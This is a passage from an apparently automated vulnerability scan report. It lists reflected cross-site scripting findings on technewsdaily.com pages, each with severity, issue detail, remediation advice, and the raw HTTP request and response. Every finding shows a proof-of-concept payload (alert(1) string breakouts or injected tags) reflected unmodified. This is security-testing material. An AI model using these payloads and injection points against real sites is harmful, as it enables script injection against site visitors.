<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/?37e1a'-alert(1)-'03372dc3979=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6553a'-alert(1)-'13e7f170564 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hologram-technology-nearly-reality-15606553a'-alert(1)-'13e7f170564/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40476
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/hologram-technology-nearly-reality-15606553a'-alert(1)-'13e7f170564/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.67. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/hologram-technology-nearly-reality-1560/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c01d'-alert(1)-'63a484c05d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hologram-technology-nearly-reality-1560/?9c01d'-alert(1)-'63a484c05d8=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65178
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/?9c01d'-alert(1)-'63a484c05d8=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.68. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/hologram-technology-nearly-reality-1560/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57fae"><a>837fc77ccfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /hologram-technology-nearly-reality-1560/?57fae"><a>837fc77ccfd=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65540
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/?57fae"><a>837fc77ccfd=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a2f'-alert(1)-'d62d319774c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-4g-works-100128-012197a2f'-alert(1)-'d62d319774c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40446
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-4g-works-100128-012197a2f'-alert(1)-'d62d319774c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.70. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/how-4g-works-100128-0121/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e069"><a>85a55c9ce0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /how-4g-works-100128-0121/?4e069"><a>85a55c9ce0a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/how-4g-works-100128-0121/?4e069"><a>85a55c9ce0a=1/" /> ...[SNIP]...
1.71. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/how-4g-works-100128-0121/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84dd1'-alert(1)-'4ab52d184db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-4g-works-100128-0121/?84dd1'-alert(1)-'4ab52d184db=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 60714
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-4g-works-100128-0121/?84dd1'-alert(1)-'4ab52d184db=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de0c'-alert(1)-'7508d792c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-imax-works-03204de0c'-alert(1)-'7508d792c75/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:44 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40436
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-imax-works-03204de0c'-alert(1)-'7508d792c75/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.73. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/how-imax-works-0320/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3fd8'-alert(1)-'b05cace007e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-imax-works-0320/?f3fd8'-alert(1)-'b05cace007e=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-imax-works-0320/?f3fd8'-alert(1)-'b05cace007e=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.74. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/how-imax-works-0320/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637d5"><a>f68d861064f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /how-imax-works-0320/?637d5"><a>f68d861064f=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61794
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/how-imax-works-0320/?637d5"><a>f68d861064f=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d815'-alert(1)-'69061a5d1c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-deauthorize-a-computer-from-itunes-remotely-12809d815'-alert(1)-'69061a5d1c5/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40508
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ext/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-12809d815'-alert(1)-'69061a5d1c5/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.76. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795d2'-alert(1)-'c96f0495c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-deauthorize-a-computer-from-itunes-remotely-1280/?795d2'-alert(1)-'c96f0495c67=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63434
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... t/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/?795d2'-alert(1)-'c96f0495c67=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.77. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f3e0"><a>be6b7a008ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /how-to-deauthorize-a-computer-from-itunes-remotely-1280/?6f3e0"><a>be6b7a008ac=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:38 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63796
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/?6f3e0"><a>be6b7a008ac=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c21d2'-alert(1)-'dd14ef7e79f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-protect-your-laptop-in-public-places-1542c21d2'-alert(1)-'dd14ef7e79f/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40494
